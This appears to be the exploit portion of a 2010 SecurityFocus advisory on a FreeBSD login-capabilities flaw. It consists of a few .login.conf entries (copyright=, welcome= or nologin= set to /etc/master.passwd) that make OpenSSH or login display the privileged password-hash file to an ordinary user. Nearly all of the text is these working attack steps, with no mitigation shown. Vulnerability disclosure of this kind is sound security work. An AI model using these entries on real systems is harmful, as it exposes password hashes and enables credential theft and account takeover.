FreeBSD Login Capabilities Privileged File Reading Vulnerability

In a .login.conf entry contained in a home directory, make the following entry if accessing the system via OpenSSH:

default: :copyright=/etc/master.passwd:

or

:welcome=/etc/master.passwd:

Otherwise, if accessing the system via login, make the following entry in a .login.conf:

default: :nologin=/etc/master.passwd:


 

Privacy Statement
Copyright 2010, SecurityFocus